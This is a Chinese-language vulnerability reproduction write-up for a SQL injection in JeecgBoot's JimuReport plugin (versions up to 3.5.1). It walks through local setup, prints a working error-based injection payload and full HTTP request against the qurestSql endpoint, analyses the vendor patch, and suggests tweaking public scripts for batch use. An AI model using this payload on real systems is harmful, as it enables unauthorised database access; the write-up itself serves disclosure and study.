簡(jiǎn)介

JeecgBoot的代碼生成器是一種可以幫助開發(fā)者快速構(gòu)建企業(yè)級(jí)應(yīng)用的工具，它可以通過(guò)一鍵生成前后端代碼，無(wú)需寫任何代碼，讓開發(fā)者更多關(guān)注業(yè)務(wù)邏輯。

影響版本

Jeecg-Boot<=3.5.1

環(huán)境搭建

idea+

后端源碼：

https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip

前端源碼：

https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip

安裝npm，安裝nodejs

https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi

安裝yarn

npm?install?-g?yarn

下載依賴

yarn?install
yarn?run?serve??//起服務(wù)

由于是前后端分離，需要數(shù)據(jù)庫(kù)導(dǎo)入表，使用navicat直接導(dǎo)入即可

后端服務(wù)端搭建，使用idea搭建導(dǎo)入項(xiàng)目，修改數(shù)據(jù)庫(kù)配置

配置server端npm服務(wù)

配置好之后直接啟動(dòng)，訪問(wèn)

http://localhost:3100/login

搭建成功

漏洞復(fù)現(xiàn)

前后端分離，后端端口8080 ，Payload：

{"apiSelectId":"1316997232402231298","id":"1'?or?'%1%'?like?(updatexml(0x3a,concat(1,(select?current_user)),1))?or?'%%'?like?'"}

POST?/jeecg-boot/jmreport/qurestSql?HTTP/1.1
Host:?localhost:8080
User-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64;?rv:109.0)?Gecko/20100101?Firefox/115.0
Content-Type:?application/json
Accept-Language:?zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding:?gzip,?deflate
Content-Length:?128{"apiSelectId":"1316997232402231298","id":"1'?or?'%1%'?like?(updatexml(0x3a,concat(1,(select?current_user)),1))?or?'%%'?like?'"}

分析

漏洞產(chǎn)生點(diǎn)位于積木報(bào)表插件內(nèi)，查看更新的3.5.1的版本更新

更改了72處的文件，其中需要注意db/其他數(shù)據(jù)庫(kù)/jeecgboot-sqlserver2019.sql中重寫了數(shù)據(jù)插入的方法

jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了對(duì)sql語(yǔ)句的正則

這個(gè)修復(fù)是針對(duì)于后端的SQL注入，/sys/duplicate/check

目前最新更新的3.5.1版本似乎依舊沒有針對(duì)積木報(bào)表注入點(diǎn)兒的加固措施,修復(fù)時(shí)更換jar包

目前積木官方的jar包已升級(jí)。

關(guān)注積木5月份的升級(jí)日志

http://jimureport.com/doc/log

小結(jié)

github上有師傅們的腳本，但是如果要批量使用的話建議在修改一下response的內(nèi)容，僅僅只有操作失敗的報(bào)錯(cuò)的話會(huì)存在大批量的報(bào)錯(cuò)。

所有自定義的if判斷的回顯都建議修改一下，如有錯(cuò)誤歡迎指出。

參考連接

http://jimureport.com/doc/log

https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln

https://github.com/padbergpete47/CVE-2023-1454